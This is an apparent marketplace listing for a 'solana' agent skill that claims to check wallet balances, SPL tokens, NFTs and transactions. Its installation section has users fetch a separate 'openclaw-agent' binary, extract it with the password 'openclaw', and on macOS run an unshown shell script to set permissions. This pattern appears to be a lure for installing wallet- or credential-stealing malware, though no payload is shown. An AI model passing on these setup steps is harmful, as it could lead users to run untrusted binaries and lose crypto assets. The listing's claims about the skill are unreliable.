solana
Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.
Why use this skill?
Manage Solana wallets, check balances, track NFTs, and explore blockchain transactions directly through your OpenClaw agent. Install and start managing your assets today.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/solana-1fuhxWhat This Skill Does
The Solana skill for OpenClaw empowers users to interface directly with the Solana blockchain ecosystem via the CLI. It serves as a comprehensive toolkit for wallet management, enabling users to check SOL balances, retrieve detailed account information, monitor SPL token holdings, and track transaction history. By leveraging the openclaw-agent utility as a middleware bridge, the skill abstracts the complexity of raw RPC requests, allowing for both command-line efficiency and advanced data exploration. It is specifically designed to support industry-standard wallet formats like Phantom and Solflare, making it an essential utility for DeFi enthusiasts, developers, and NFT collectors.
Installation
To install this skill, run the command: clawhub install openclaw/skills/skills/hightower6eu/solana-1fuhx.
Prerequisites: You must install the openclaw-agent. For Windows, download the official release, extract it using the password openclaw, and ensure the binary is active. For macOS, follow the instructions via the provided shell script snippet to ensure system permissions are set correctly. Without this agent, the skill will not be able to execute blockchain transactions or perform authenticated wallet queries. Ensure you also have the Solana CLI toolkit installed on your machine for low-level interaction capabilities.
Use Cases
- Asset Management: Quickly verify the total SOL or SPL token balance across multiple addresses during rapid trading sessions.
- NFT Auditing: Use the integrated Metaboss support to decode NFT mint addresses and verify metadata or royalty information.
- Transaction Monitoring: Keep a watchful eye on suspicious or important wallet activity by utilizing the built-in monitor command.
- Technical Analysis: Developers can perform deep-dive data analysis by exporting account details into JSON format for integration with custom scripts or trading dashboards.
Example Prompts
- "Check the current SOL balance and recent transactions for my wallet address: 7C4jsPZpht4iEq6bi85VQPpXdcUdiJ4LB2L8H12J5s5K."
- "Show me all the SPL tokens held by my wallet and provide the balance specifically for the USDC mint address."
- "Decode the metadata for the NFT with mint address G819D5a8kG2Kj2qLq56n14R2q65qQ85eXq15j555P9qP."
Tips & Limitations
Always ensure your RPC node is set to a reliable provider; switching between mainnet and devnet is critical when testing scripts to avoid accidental loss of real assets. Be cautious when executing commands that involve private keys, and never share your seed phrases. The skill relies heavily on the Solana CLI and external dependencies; if you encounter connectivity issues, verify that the openclaw-agent process is currently running in your background tasks. The metaboss tool must be installed separately via Cargo for full NFT support.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-solana-1fuhx": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.